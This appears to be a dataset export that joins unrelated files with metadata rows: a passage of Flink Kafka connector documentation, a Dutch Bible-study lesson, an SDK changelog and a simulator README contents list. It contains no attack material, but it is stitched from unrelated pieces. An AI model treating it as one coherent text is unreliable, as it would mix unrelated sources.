final StreamExecutionEnvironment env = StreamExecutionEnvironment.getExecutionEnvironment();
FlinkKafkaConsumer<String> myConsumer = new FlinkKafkaConsumer<>(...);
myConsumer.setStartFromEarliest(); // start from the earliest record possible
myConsumer.setStartFromLatest(); // start from the latest record
myConsumer.setStartFromTimestamp(...); // start from specified epoch timestamp (milliseconds)
myConsumer.setStartFromGroupOffsets(); // the default behaviour
DataStream<String> stream = env.addSource(myConsumer);
...
{% endhighlight %}
</div>
<div data-lang="scala" markdown="1">
{% highlight scala %}
val env = StreamExecutionEnvironment.getExecutionEnvironment()
val myConsumer = new FlinkKafkaConsumer[String](...)
myConsumer.setStartFromEarliest() // start from the earliest record possible
myConsumer.setStartFromLatest() // start from the latest record
myConsumer.setStartFromTimestamp(...) // start from specified epoch timestamp (milliseconds)
myConsumer.setStartFromGroupOffsets() // the default behaviour
val stream = env.addSource(myConsumer)
...
{% endhighlight %}
</div>
</div>
All versions of the Flink Kafka Consumer have the above explicit configuration methods for start position.
* `setStartFromGroupOffsets` (default behaviour): Start reading partitions from
the consumer group's (`group.id` setting in the consumer properties) committed
offsets in Kafka brokers. If offsets could not be
found for a partition, the `auto.offset.reset` setting in the properties will be used.
* `setStartFromEarliest()` / `setStartFromLatest()`: Start from the earliest / latest
record. Under these modes, committed offsets in Kafka will be ignored and
not used as starting positions. If offsets become out of range for a partition,
the `auto.offset.reset` setting in the properties will be used.
* `setStartFromTimestamp(long)`: Start from the specified timestamp. For each partition, the record
whose timestamp is larger than or equal to the specified timestamp will be used as the start position.
If a partition's latest record is earlier than the timestamp, the partition will simply be read
from the latest record. Under this mode, committed offsets in Kafka will be ignored and not used as
starting positions.
You can also specify the exact offsets the consumer should start from for each partition:
<div class="codetabs" markdown="1">
<div data-lang="java" markdown="1">
{% highlight java %}
Map<KafkaTopicPartition, Long> specificStartOffsets = new HashMap<>();
specificStartOffsets.put(new KafkaTopicPartition("myTopic", 0), 23L);
specificStartOffsets.put(new KafkaTopicPartition("myTopic", 1), 31L);
specificStartOffsets.put(new KafkaTopicPartition("myTopic", 2), 43L);
myConsumer.setStartFromSpecificOffsets(specificStartOffsets);
{% endhighlight %}
</div>
<div data-lang="scala" markdown="1">
{% highlight scala %}
val specificStartOffsets = new java.util.HashMap[KafkaTopicPartition, java.lang.Long]()
specificStartOffsets.put(new KafkaTopicPartition("myTopic", 0), 23L)
specificStartOffsets.put(new KafkaTopicPartition("myTopic", 1), 31L)
specificStartOffsets.put(new KafkaTopicPartition("myTopic", 2), 43L)
myConsumer.setStartFromSpecificOffsets(specificStartOffsets)
{% endhighlight %}
</div>
</div>
The above example configures the consumer to start from the specified offsets for
partitions 0, 1, and 2 of topic `myTopic`. The offset values should be the
next record that the consumer should read for each partition. Note that
if the consumer needs to read a partition which does not have a specified
offset within the provided offsets map, it will fallback to the default
group offsets behaviour (i.e. `setStartFromGroupOffsets()`) for that
particular partition.
Note that these start position configuration methods do not affect the start position when the job is
automatically restored from a failure or manually restored using a savepoint.
On restore, the start position of each Kafka partition is determined by the
offsets stored in the savepoint or checkpoint
(please see the next section for information about checkpointing to enable
fault tolerance for the consumer).
### Kafka Consumers and Fault Tolerance
With Flink's checkpointing enabled, the Flink Kafka Consumer will consume records from a topic and periodically checkpoint all
its Kafka offsets, together with the state of other operations. In case of a job failure, Flink will restore
the streaming program to the state of the latest checkpoint and re-consume the records from Kafka, starting from the offsets that were
stored in the checkpoint.
The interval of drawing checkpoints therefore defines how much the program may have to go back at most, in case of a failure.
To use fault tolerant Kafka Consumers, checkpointing of the topology needs to be enabled in the [job]({% link deployment/config.md %}#execution-checkpointing-interval).
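For example, checkpointing can also be enabled programmatically on the execution environment (the 5-second interval below is only an illustrative value):

{% highlight java %}
final StreamExecutionEnvironment env = StreamExecutionEnvironment.getExecutionEnvironment();
env.enableCheckpointing(5000); // checkpoint every 5000 msecs
{% endhighlight %}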
If checkpointing is disabled, the Kafka consumer will periodically commit the offsets to the Kafka brokers, using the automatic commit functionality of the internally used Kafka client.
### Kafka Consumers Topic and Partition Discovery
#### Partition discovery
The Flink Kafka Consumer supports discovering dynamically created Kafka partitions, and consumes them with
exactly-once guarantees. All partitions discovered after the initial retrieval of partition metadata (i.e., when the
job starts running) will be consumed from the earliest possible offset.
By default, partition discovery is disabled. To enable it, set a non-negative value
for `flink.partition-discovery.interval-millis` in the provided properties config,
representing the discovery interval in milliseconds.
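For example (the 10-second interval is an arbitrary value chosen for illustration):

{% highlight java %}
Properties properties = new Properties();
// ... other consumer properties ...
properties.setProperty("flink.partition-discovery.interval-millis", "10000"); // check for new partitions every 10 s
{% endhighlight %}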
#### Topic discovery
The Kafka Consumer is also capable of discovering topics by matching topic names using regular expressions.
<div class="codetabs" markdown="1">
<div data-lang="java" markdown="1">
{% highlight java %}
final StreamExecutionEnvironment env = StreamExecutionEnvironment.getExecutionEnvironment();
Properties properties = new Properties();
properties.setProperty("bootstrap.servers", "localhost:9092");
properties.setProperty("group.id", "test");
FlinkKafkaConsumer<String> myConsumer = new FlinkKafkaConsumer<>(
java.util.regex.Pattern.compile("test-topic-[0-9]"),
new SimpleStringSchema(),
properties);
DataStream<String> stream = env.addSource(myConsumer);
...
{% endhighlight %}
</div>
<div data-lang="scala" markdown="1">
{% highlight scala %}
val env = StreamExecutionEnvironment.getExecutionEnvironment()
val properties = new Properties()
properties.setProperty("bootstrap.servers", "localhost:9092")
properties.setProperty("group.id", "test")
val myConsumer = new FlinkKafkaConsumer[String](
java.util.regex.Pattern.compile("test-topic-[0-9]"),
new SimpleStringSchema,
properties)
val stream = env.addSource(myConsumer)
...
{% endhighlight %}
</div>
</div>
In the above example, all topics with names that match the specified regular expression
(starting with `test-topic-` and ending with a single digit) will be subscribed by the consumer
when the job starts running.
To allow the consumer to discover dynamically created topics after the job started running,
set a non-negative value for `flink.partition-discovery.interval-millis`. This allows
the consumer to discover partitions of new topics with names that also match the specified
pattern.
### Kafka Consumers Offset Committing Behaviour Configuration
The Flink Kafka Consumer allows configuring the behaviour of how offsets
are committed back to Kafka brokers. Note that the
Flink Kafka Consumer does not rely on the committed offsets for fault
tolerance guarantees. The committed offsets are only a means to expose
the consumer's progress for monitoring purposes.
The way to configure offset commit behaviour is different, depending on
whether checkpointing is enabled for the job.
- *Checkpointing disabled:* if checkpointing is disabled, the Flink Kafka
Consumer relies on the automatic periodic offset committing capability
of the internally used Kafka clients. Therefore, to disable or enable offset
committing, simply set the `enable.auto.commit` / `auto.commit.interval.ms` keys to appropriate values
in the provided `Properties` configuration.
- *Checkpointing enabled:* if checkpointing is enabled, the Flink Kafka
Consumer will commit the offsets stored in the checkpointed states when
the checkpoints are completed. This ensures that the committed offsets
in Kafka brokers is consistent with the offsets in the checkpointed states.
Users can choose to disable or enable offset committing by calling the
`setCommitOffsetsOnCheckpoints(boolean)` method on the consumer (by default,
  the behaviour is `true`), as shown in the sketch after this list.
Note that in this scenario, the automatic periodic offset committing
  settings in `Properties` are completely ignored.
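For example, with checkpointing enabled, offset committing can be switched off like this (a minimal sketch; `properties` is assumed to be configured as in the earlier examples):

{% highlight java %}
FlinkKafkaConsumer<String> myConsumer =
    new FlinkKafkaConsumer<>("topic", new SimpleStringSchema(), properties);
myConsumer.setCommitOffsetsOnCheckpoints(false); // do not expose progress to Kafka brokers
{% endhighlight %}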
### Kafka Consumers and Timestamp Extraction/Watermark Emission
In many scenarios, the timestamp of a record is embedded in the record itself, or the metadata of the `ConsumerRecord`.
In addition, users may want to emit watermarks either periodically, or irregularly, e.g. based on
special records in the Kafka stream that contain the current event-time watermark. For these cases, the Flink Kafka
Consumer allows the specification of a [watermark strategy]({% link dev/event_time.md %}).
You can specify your custom strategy as described
[here]({% link dev/event_timestamps_watermarks.md %}), or use one from the
[predefined ones]({% link dev/event_timestamp_extractors.md %}).
<div class="codetabs" markdown="1">
<div data-lang="java" markdown="1">
{% highlight java %}
Properties properties = new Properties();
properties.setProperty("bootstrap.servers", "localhost:9092");
properties.setProperty("group.id", "test");
FlinkKafkaConsumer<String> myConsumer =
new FlinkKafkaConsumer<>("topic", new SimpleStringSchema(), properties);
myConsumer.assignTimestampsAndWatermarks(
    WatermarkStrategy
        .forBoundedOutOfOrderness(Duration.ofSeconds(20)));
DataStream<String> stream = env.addSource(myConsumer);
{% endhighlight %}
</div>
<div data-lang="scala" markdown="1">
{% highlight scala %}
val properties = new Properties()
properties.setProperty("bootstrap.servers", "localhost:9092")
properties.setProperty("group.id", "test")
val myConsumer =
    new FlinkKafkaConsumer[String]("topic", new SimpleStringSchema(), properties)
myConsumer.assignTimestampsAndWatermarks(
    WatermarkStrategy
        .forBoundedOutOfOrderness(Duration.ofSeconds(20)))
val stream = env.addSource(myConsumer)
{% endhighlight %}
</div>
</div>
**Note**: If a watermark assigner depends on records read from Kafka to advance its watermarks
(which is commonly the case), all topics and partitions need to have a continuous stream of records.
Otherwise, the watermarks of the whole application cannot advance and all time-based operations,
such as time windows or functions with timers, cannot make progress. A single idle Kafka partition causes this behavior.
Consider setting appropriate [idleness timeouts]({% link dev/event_timestamps_watermarks.md %}#dealing-with-idle-sources) to mitigate this issue.
## Kafka Producer
Flink’s Kafka Producer - `FlinkKafkaProducer` allows writing a stream of records to one or more Kafka topics.
The constructor accepts the following arguments:
1. A default output topic where events should be written
2. A SerializationSchema / KafkaSerializationSchema for serializing data into Kafka
3. Properties for the Kafka client. The following properties are required:
* "bootstrap.servers" (comma separated list of Kafka brokers)
4. A fault-tolerance semantic
<div class="codetabs" markdown="1">
<div data-lang="java" markdown="1">
{% highlight java %}
DataStream<String> stream = ...
Properties properties = new Properties();
properties.setProperty("bootstrap.servers", "localhost:9092");
FlinkKafkaProducer<String> myProducer = new FlinkKafkaProducer<>(
"my-topic", // target topic
new SimpleStringSchema(), // serialization schema
properties, // producer config
FlinkKafkaProducer.Semantic.EXACTLY_ONCE); // fault-tolerance
stream.addSink(myProducer);
{% endhighlight %}
</div>
<div data-lang="scala" markdown="1">
{% highlight scala %}
val stream: DataStream[String] = ...
val properties = new Properties
properties.setProperty("bootstrap.servers", "localhost:9092")
val myProducer = new FlinkKafkaProducer[String](
"my-topic", // target topic
new SimpleStringSchema(), // serialization schema
properties, // producer config
FlinkKafkaProducer.Semantic.EXACTLY_ONCE) // fault-tolerance
stream.addSink(myProducer)
{% endhighlight %}
</div>
</div>
## The `SerializationSchema`
The Flink Kafka Producer needs to know how to turn Java/Scala objects into binary data.
The `KafkaSerializationSchema` allows users to specify such a schema.
The `ProducerRecord<byte[], byte[]> serialize(T element, @Nullable Long timestamp)` method gets called for each record, generating a `ProducerRecord` that is written to Kafka.
This gives users fine-grained control over how data is written out to Kafka.
Through the producer record you can:
* Set header values
* Define keys for each record
* Specify custom partitioning of data
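The following sketch (the topic handling and the choice of key are assumptions made for illustration, not prescribed by the API) shows a `KafkaSerializationSchema` that writes each string as the record value and uses the same string as the record key:

{% highlight java %}
import org.apache.flink.streaming.connectors.kafka.KafkaSerializationSchema;
import org.apache.kafka.clients.producer.ProducerRecord;

import java.nio.charset.StandardCharsets;

public class KeyedStringSerializationSchema implements KafkaSerializationSchema<String> {

    private final String topic;

    public KeyedStringSerializationSchema(String topic) {
        this.topic = topic;
    }

    @Override
    public ProducerRecord<byte[], byte[]> serialize(String element, Long timestamp) {
        byte[] key = element.getBytes(StandardCharsets.UTF_8);   // the key determines the target partition
        byte[] value = element.getBytes(StandardCharsets.UTF_8);
        return new ProducerRecord<>(topic, key, value);
    }
}
{% endhighlight %}

A schema like this can then be handed to the `FlinkKafkaProducer` constructor in place of the plain `SerializationSchema` shown earlier.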
### Kafka Producers and Fault Tolerance
With Flink's checkpointing enabled, the `FlinkKafkaProducer` can provide
exactly-once delivery guarantees.
Besides enabling Flink's checkpointing, you can also choose one of three different modes of operation
by passing the appropriate `semantic` parameter to the `FlinkKafkaProducer`:
* `Semantic.NONE`: Flink will not guarantee anything. Produced records can be lost or they can
be duplicated.
* `Semantic.AT_LEAST_ONCE` (default setting): This guarantees that no records will be lost (although they can be duplicated).
* `Semantic.EXACTLY_ONCE`: Kafka transactions will be used to provide exactly-once semantic. Whenever you write
to Kafka using transactions, do not forget about setting desired `isolation.level` (`read_committed`
or `read_uncommitted` - the latter one is the default value) for any application consuming records
  from Kafka (see the example after this list).
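For example, a downstream Flink consumer that should only see committed records could be configured like this (a minimal sketch; the broker address and group id are placeholders):

{% highlight java %}
Properties consumerProps = new Properties();
consumerProps.setProperty("bootstrap.servers", "localhost:9092");
consumerProps.setProperty("group.id", "downstream-app");
// only read records that are part of committed transactions
consumerProps.setProperty("isolation.level", "read_committed");
FlinkKafkaConsumer<String> consumer =
    new FlinkKafkaConsumer<>("my-topic", new SimpleStringSchema(), consumerProps);
{% endhighlight %}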
##### Caveats
`Semantic.EXACTLY_ONCE` mode relies on the ability to commit transactions
that were started before taking a checkpoint, after recovering from the said checkpoint. If the time
between Flink application crash and completed restart is larger than Kafka's transaction timeout
there will be data loss (Kafka will automatically abort transactions that exceeded timeout time).
Having this in mind, please configure your transaction timeout appropriately to your expected down
times.
Kafka brokers by default have `transaction.max.timeout.ms` set to 15 minutes. This property will
not allow to set transaction timeouts for the producers larger than it's value.
`FlinkKafkaProducer` by default sets the `transaction.timeout.ms` property in producer config to
1 hour, thus `transaction.max.timeout.ms` should be increased before using the
`Semantic.EXACTLY_ONCE` mode.
In `read_committed` mode of `KafkaConsumer`, any transactions that were not finished
(neither aborted nor completed) will block all reads from the given Kafka topic past any
un-finished transaction. In other words after following sequence of events:
1. User started `transaction1` and written some records using it
2. User started `transaction2` and written some further records using it
3. User committed `transaction2`
Even if records from `transaction2` are already committed, they will not be visible to
the consumers until `transaction1` is committed or aborted. This has two implications:
* First of all, during normal working of Flink applications, user can expect a delay in visibility
of the records produced into Kafka topics, equal to average time between completed checkpoints.
* Secondly in case of Flink application failure, topics into which this application was writing,
will be blocked for the readers until the application restarts or the configured transaction
timeout time will pass. This remark only applies for the cases when there are multiple
agents/applications writing to the same Kafka topic.
**Note**: `Semantic.EXACTLY_ONCE` mode uses a fixed size pool of KafkaProducers
per each `FlinkKafkaProducer` instance. One of each of those producers is used per one
checkpoint. If the number of concurrent checkpoints exceeds the pool size, `FlinkKafkaProducer`
will throw an exception and will fail the whole application. Please configure max pool size and max
number of concurrent checkpoints accordingly.
**Note**: `Semantic.EXACTLY_ONCE` takes all possible measures to not leave any lingering transactions
that would block the consumers from reading from Kafka topic more then it is necessary. However in the
event of failure of Flink application before first checkpoint, after restarting such application there
is no information in the system about previous pool sizes. Thus it is unsafe to scale down Flink
application before first checkpoint completes, by factor larger than `FlinkKafkaProducer.SAFE_SCALE_DOWN_FACTOR`.
## Kafka Connector Metrics
Flink's Kafka connectors provide some metrics through Flink's [metrics system]({% link ops/metrics.md %}) to analyze
the behavior of the connector.
The producers export Kafka's internal metrics through Flink's metric system for all supported versions.
The Kafka documentation lists all exported metrics in its [documentation](http://kafka.apache.org/documentation/#selector_monitoring).
In addition to these metrics, all consumers expose the `current-offsets` and `committed-offsets` for each topic partition.
The `current-offsets` refers to the current offset in the partition. This refers to the offset of the last element that
we retrieved and emitted successfully. The `committed-offsets` is the last committed offset.
The Kafka Consumers in Flink commit the offsets back to the Kafka brokers.
If checkpointing is disabled, offsets are committed periodically.
With checkpointing, the commit happens once all operators in the streaming topology have confirmed that they've created a checkpoint of their state.
This provides users with at-least-once semantics for the offsets committed to Zookeeper or the broker. For offsets checkpointed to Flink, the system
provides exactly once guarantees.
The offsets committed to ZK or the broker can also be used to track the read progress of the Kafka consumer. The difference between
the committed offset and the most recent offset in each partition is called the *consumer lag*. If the Flink topology is consuming
the data slower from the topic than new data is added, the lag will increase and the consumer will fall behind.
For large production deployments we recommend monitoring that metric to avoid increasing latency.
## Enabling Kerberos Authentication
Flink provides first-class support through the Kafka connector to authenticate to a Kafka installation
configured for Kerberos. Simply configure Flink in `flink-conf.yaml` to enable Kerberos authentication for Kafka like so:
1. Configure Kerberos credentials by setting the following -
- `security.kerberos.login.use-ticket-cache`: By default, this is `true` and Flink will attempt to use Kerberos credentials in ticket caches managed by `kinit`.
Note that when using the Kafka connector in Flink jobs deployed on YARN, Kerberos authorization using ticket caches will not work.
This is also the case when deploying using Mesos, as authorization using ticket cache is not supported for Mesos deployments.
- `security.kerberos.login.keytab` and `security.kerberos.login.principal`: To use Kerberos keytabs instead, set values for both of these properties.
2. Append `KafkaClient` to `security.kerberos.login.contexts`: This tells Flink to provide the configured Kerberos credentials to the Kafka login context to be used for Kafka authentication.
Once Kerberos-based Flink security is enabled, you can authenticate to Kafka with either the Flink Kafka Consumer or Producer
by simply including the following two settings in the provided properties configuration that is passed to the internal Kafka client:
- Set `security.protocol` to `SASL_PLAINTEXT` (default `NONE`): The protocol used to communicate to Kafka brokers.
When using standalone Flink deployment, you can also use `SASL_SSL`; please see how to configure the Kafka client for SSL [here](https://kafka.apache.org/documentation/#security_configclients).
- Set `sasl.kerberos.service.name` to `kafka` (default `kafka`): The value for this should match the `sasl.kerberos.service.name` used for Kafka broker configurations.
A mismatch in service name between client and server configuration will cause the authentication to fail.
For more information on Flink configuration for Kerberos security, please see [here]({% link deployment/config.md %}).
You can also find [here]({% link deployment/security/security-kerberos.md %}) further details on how Flink internally setups Kerberos-based security.
## Upgrading to the Latest Connector Version
The generic upgrade steps are outlined in [upgrading jobs and Flink versions
guide]({% link ops/upgrading.md %}). For Kafka, you additionally need
to follow these steps:
* Do not upgrade Flink and the Kafka Connector version at the same time.
* Make sure you have a `group.id` configured for your Consumer.
* Set `setCommitOffsetsOnCheckpoints(true)` on the consumer so that read
offsets are committed to Kafka. It's important to do this before stopping and
taking the savepoint. You might have to do a stop/restart cycle on the old
connector version to enable this setting.
* Set `setStartFromGroupOffsets(true)` on the consumer so that we get read
offsets from Kafka. This will only take effect when there is no read offset
in Flink state, which is why the next step is very important.
* Change the assigned `uid` of your source/sink. This makes sure the new
source/sink doesn't read state from the old source/sink operators.
* Start the new job with `--allow-non-restored-state` because we still have the
state of the previous connector version in the savepoint.
## Troubleshooting
<div class="alert alert-warning">
If you have a problem with Kafka when using Flink, keep in mind that Flink only wraps
<a href="https://kafka.apache.org/documentation/#consumerapi">KafkaConsumer</a> or
<a href="https://kafka.apache.org/documentation/#producerapi">KafkaProducer</a>
and your problem might be independent of Flink and sometimes can be solved by upgrading Kafka brokers,
reconfiguring Kafka brokers or reconfiguring <tt>KafkaConsumer</tt> or <tt>KafkaProducer</tt> in Flink.
Some examples of common problems are listed below.
</div>
### Data loss
Depending on your Kafka configuration, even after Kafka acknowledges
writes you can still experience data loss. In particular keep in mind about the following properties
in Kafka config:
- `acks`
- `log.flush.interval.messages`
- `log.flush.interval.ms`
- `log.flush.*`
Default values for the above options can easily lead to data loss.
Please refer to the Kafka documentation for more explanation.
### UnknownTopicOrPartitionException
One possible cause of this error is when a new leader election is taking place,
for example after or during restarting a Kafka broker.
This is a retriable exception, so Flink job should be able to restart and resume normal operation.
It also can be circumvented by changing `retries` property in the producer settings.
However this might cause reordering of messages,
which in turn if undesired can be circumvented by setting `max.in.flight.requests.per.connection` to 1.
{% top %}
| 50.317881 | 203 | 0.785108 | eng_Latn | 0.992421 |
e03b0c36e4614f3b7de7b29382d4bf343abbb1f7 | 2,804 | md | Markdown | src/nl/2020-02/04/05.md | PrJared/sabbath-school-lessons | 94a27f5bcba987a11a698e5e0d4279b81a68bc9a | [
"MIT"
] | 68 | 2016-10-30T23:17:56.000Z | 2022-03-27T11:58:16.000Z | src/nl/2020-02/04/05.md | PrJared/sabbath-school-lessons | 94a27f5bcba987a11a698e5e0d4279b81a68bc9a | [
"MIT"
] | 367 | 2016-10-21T03:50:22.000Z | 2022-03-28T23:35:25.000Z | src/nl/2020-02/04/05.md | PrJared/sabbath-school-lessons | 94a27f5bcba987a11a698e5e0d4279b81a68bc9a | [
"MIT"
] | 109 | 2016-08-02T14:32:13.000Z | 2022-03-31T10:18:41.000Z | ---
title: Verstand
date: 22/04/2020
---
`Lees 2 Korintiërs 10:5-6; Spreuken 1:7; 9:10. Waarom wordt er zoveel nadruk gelegd op de gehoorzaamheid aan Christus in onze gedachten? Waarom is ontzag voor de HEER het begin van alle kennis?`
God stelt ons in staat na te denken en te redeneren. Elke activiteit en elk theologisch argument en ons vermogen conclusies te trekken gaat daar vanuit. Ons geloof is ook niet irrationeel. Na de periode van de Verlichting in de 18 e eeuw werd de menselijke rede met name in de westerse wereld dominant. Dat ging verder dan de mogelijkheid tot nadenken en tot de juiste conclusies komen. Tegenover het idee dat al onze kennis is gebaseerd op zintuiglijke waarnemingen, staat de andere zienswijze dat het menselijke verstand de voornaamste bron is van kennis. Dat is het rationalisme en dat beweert dat waarheid niet zintuiglijk maar intellectueel is en voortkomt uit de rede. Er zijn waarheden waar we alleen door ons verstand vat op krijgen. Zo wordt de menselijke rede de maatstaf voor wat waar is. Het verstand werd het nieuwe gezag waarvoor al het andere moest buigen, inclusief dat van de kerk en zelfs de Bijbel als Gods Woord. Alles werd verworpen wat de menselijke rede niet begreep, en de geldigheid werd in twijfel getrokken. Deze denkwijze heeft veel invloed gehad op grote delen van de Schrift. Alle wonderen en bovennatuurlijke daden van God, zoals de lichamelijke opstanding van Jezus, de maagdelijke geboorte, de schepping in zes dagen, werden niet langer voor betrouwbaar en waar aangenomen.
We moeten bedenken dat zelfs ons vermogen tot redeneren is aangetast door de zonde en dus onder de heerschappij van Christus moet worden gebracht. Het begrip van mensen is verduisterd en ze zijn vervreemd van God. Gods Woord moet ons verlichten. Het feit dat God onze Schepper is wijst er daarbij ook op dat ons menselijk verstand vanuit Bijbels oogpunt niet is geschapen als iets dat onafhankelijk van God functioneert. Het is veel eerder zo: ‘het ontzag voor de HEER is het begin van alle kennis’ (Spreuken 9:10, vergelijk met Spreuken 1:7). Als we Gods openbaring, zoals deze vorm heeft gekregen in het geschreven Woord van God, de hoogste eer toekennen en bereid zijn wat in de Bijbel staat geschreven na te volgen, alleen dan zijn we in staat ons verstand op de juiste manier te gebruiken.
`Eeuwen geleden maakte de Amerikaanse president Thomas Jefferson zijn eigen versie van het Nieuwe Testament. Hij haalde alles eruit wat naar zijn idee inging tegen de menselijke rede. Bijna alle wonderen van Jezus werden geëlimineerd, inclusief zijn opstanding. Wat kunnen we uit dit voorbeeld leren over de begrensdheid van het menselijke verstand om de waarheid te vatten?`
`2 Korintiërs 10:5-6; Spreuken 1:7; 9:10 Wat is het begin van kennis & wijsheid?`
| 186.933333 | 1,306 | 0.805278 | nld_Latn | 1.000005 |
e03b0c6c4c503061f0a528d925f4f22d2aed5818 | 4,941 | md | Markdown | CHANGELOG.md | DeAccountSystems/das-sdk-js | 465c37b9bb3725e7f6480cec2f7b24ba1bbbd454 | [
"MIT"
] | 7 | 2021-07-24T02:06:52.000Z | 2022-01-04T17:45:28.000Z | CHANGELOG.md | DeAccountSystems/das-sdk-js | 465c37b9bb3725e7f6480cec2f7b24ba1bbbd454 | [
"MIT"
] | 2 | 2021-09-01T04:16:02.000Z | 2021-12-22T07:06:08.000Z | CHANGELOG.md | DeAccountSystems/das-sdk-js | 465c37b9bb3725e7f6480cec2f7b24ba1bbbd454 | [
"MIT"
] | 3 | 2021-08-19T10:08:18.000Z | 2021-11-15T02:01:41.000Z | # Changelog
All notable changes to this project will be documented in this file. See [standard-version](https://github.com/conventional-changelog/standard-version) for commit guidelines.
### [1.1.5](https://github.com/DeAccountSystems/das-sdk/compare/v1.1.2...v1.1.5) (2021-12-29)
### Bug Fixes
* add missing dependency `node-fetch` ([4009afe](https://github.com/DeAccountSystems/das-sdk/commit/4009afe9da6deea4677c76ff79b99de439299ba9))
### [1.1.2](https://github.com/DeAccountSystems/das-sdk/compare/v1.1.0...v1.1.2) (2021-12-27)
## [1.1.0](https://github.com/DeAccountSystems/das-sdk/compare/v0.4.1...v1.1.0) (2021-12-24)
### Features
* **Das.ts:** remove `accountsForOwner()`, add `reverseRecord()` ([bb2dffa](https://github.com/DeAccountSystems/das-sdk/commit/bb2dffaa6b2d92edae9e7b98445db620fcbc25e5))
* **DasService.ts:** integrate with new das-account-indexer ([bf9cac4](https://github.com/DeAccountSystems/das-sdk/commit/bf9cac4eecc7535f457b6a156a78d285ce5284d8))
### [0.4.1](https://github.com/DeAccountSystems/das-sdk/compare/v0.3.3...v0.4.1) (2021-08-09)
### Features
* add method `accountsForOwner` ([4fbd77f](https://github.com/DeAccountSystems/das-sdk/commit/4fbd77f1f9c0cdc06bd81e9f28aafb0a98c99286))
* remove unnecessary dependencies ([2645d14](https://github.com/DeAccountSystems/das-sdk/commit/2645d14d16ff4d4179d2d6b7bd08a38648c98821))
### [0.3.3](https://github.com/DeAccountSystems/das-sdk/compare/v0.3.1...v0.3.3) (2021-07-29)
### Features
* remove unused code ([82bc2d1](https://github.com/DeAccountSystems/das-sdk/commit/82bc2d15c24860fd184d0c5642f629941d608fc2))
* remove unused code ([339eea5](https://github.com/DeAccountSystems/das-sdk/commit/339eea5008143b7c19593d0ca75c8bfb2b4b678b))
### Bug Fixes
* `custom` => `custom_key` ([68b8b50](https://github.com/DeAccountSystems/das-sdk/commit/68b8b50df0ac419e51897e6ebf3966219870de8b))
### [0.3.1](https://github.com/DeAccountSystems/das-sdk/compare/v0.2.1...v0.3.1) (2021-07-26)
### Features
* add Das() class ([58ae5bd](https://github.com/DeAccountSystems/das-sdk/commit/58ae5bd71b85d9790dbd4ccc76333fd1e68d9506))
### [0.2.1](https://github.com/DeAccountSystems/das-sdk/compare/v0.1.5...v0.2.1) (2021-07-24)
### Features
* add `account()` function ([b13f077](https://github.com/DeAccountSystems/das-sdk/commit/b13f07756ae79d99e49410bcfb0b93daf866fe23))
### [0.1.5](https://github.com/DeAccountSystems/das-sdk/compare/v0.1.3...v0.1.5) (2021-07-20)
### Bug Fixes
* fix `addr()` bug ([7f52461](https://github.com/DeAccountSystems/das-sdk/commit/7f5246169a78023d04e74c76210d930ddfc6976b))
### [0.1.3](https://github.com/DeAccountSystems/das-sdk/compare/v0.0.3...v0.1.3) (2021-07-20)
### Features
* add `recordsByKey()` method ([ffe5230](https://github.com/DeAccountSystems/das-sdk/commit/ffe523087bcd519741cf553447ca142627f1e6dc))
* add configuration docs ([ac5224b](https://github.com/DeAccountSystems/das-sdk/commit/ac5224b02476a200f876f975426751488403f5d0))
* add test for `recordsByKey` ([bad1b93](https://github.com/DeAccountSystems/das-sdk/commit/bad1b9315bc2bbf539358db4718b7896407a8a06))
* add test for autonetwork ([16fbd90](https://github.com/DeAccountSystems/das-sdk/commit/16fbd90f18fdd986f4e439f045920028008cee70))
* implement autonetwork ([6925df6](https://github.com/DeAccountSystems/das-sdk/commit/6925df6a773743f21e9bdfb7ff2b73f09d23a356))
### Bug Fixes
* fix test ([20bc061](https://github.com/DeAccountSystems/das-sdk/commit/20bc0613fa14d321bba4c3361ba09766e2135935))
### [0.1.1](https://github.com/DeAccountSystems/das-sdk/compare/v0.0.3...v0.1.1) (2021-07-19)
### Features
* add `recordsByKey()` method ([ffe5230](https://github.com/DeAccountSystems/das-sdk/commit/ffe523087bcd519741cf553447ca142627f1e6dc))
* add test for `recordsByKey` ([bad1b93](https://github.com/DeAccountSystems/das-sdk/commit/bad1b9315bc2bbf539358db4718b7896407a8a06))
* add test for autonetwork ([16fbd90](https://github.com/DeAccountSystems/das-sdk/commit/16fbd90f18fdd986f4e439f045920028008cee70))
* implement autonetwork ([6925df6](https://github.com/DeAccountSystems/das-sdk/commit/6925df6a773743f21e9bdfb7ff2b73f09d23a356))
### Bug Fixes
* fix test ([20bc061](https://github.com/DeAccountSystems/das-sdk/commit/20bc0613fa14d321bba4c3361ba09766e2135935))
### 0.0.3 (2021-07-14)
### Features
* add Das ([b0e3ba8](https://github.com/DeAccountSystems/das-sdk/commit/b0e3ba80f0d992dabc7312fe9fe8e6b8632a35a2))
* change build files ([3f5e810](https://github.com/DeAccountSystems/das-sdk/commit/3f5e810fb726ab1e38963417e187872d4de1b414))
* change repo ([5e38ddf](https://github.com/DeAccountSystems/das-sdk/commit/5e38ddf636053f8cc7327a2104bf6ffa000c9c34))
* remove unused files ([3b64a19](https://github.com/DeAccountSystems/das-sdk/commit/3b64a1931bd26543624f56c86405cfcf5c5f06ee))
### Bug Fixes
* fix record bug ([18a0a82](https://github.com/DeAccountSystems/das-sdk/commit/18a0a8235c2d72cf5a2a5d57f5c53ca068cd8411))
| 45.330275 | 174 | 0.77292 | yue_Hant | 0.509659 |
e03bbbb3d3a6c6cb03047bb7385cc312e1deb466 | 4,621 | md | Markdown | docs/README.md | ray-milkey/gnxi-simulators | 9fa14047d409d7a64cce9f92a42a02238dea01b8 | [
"Apache-2.0"
] | 5 | 2020-02-07T15:57:23.000Z | 2022-03-23T14:11:30.000Z | docs/README.md | ray-milkey/gnxi-simulators | 9fa14047d409d7a64cce9f92a42a02238dea01b8 | [
"Apache-2.0"
] | 10 | 2020-04-14T20:34:04.000Z | 2022-03-22T18:35:22.000Z | docs/README.md | ray-milkey/gnxi-simulators | 9fa14047d409d7a64cce9f92a42a02238dea01b8 | [
"Apache-2.0"
] | 7 | 2020-04-15T23:44:15.000Z | 2021-12-13T10:31:12.000Z | **Table of Contents**
- [1. Device Simulator](#1-Device-Simulator)
- [1.1. Simulator mode](#11-Simulator-mode)
- [1.2. Run mode - localhost or network](#12-Run-mode---localhost-or-network)
- [1.3. docker-compose](#13-docker-compose)
- [1.3.1. Running on Linux](#131-Running-on-Linux)
- [1.4. Run a single docker container](#14-Run-a-single-docker-container)
- [1.5. Create the docker image](#15-Create-the-docker-image)
- [2. Client tools for testing](#2-Client-tools-for-testing)
- [2.1. gNMI Client User Manual](#21-gNMI-Client-User-Manual)
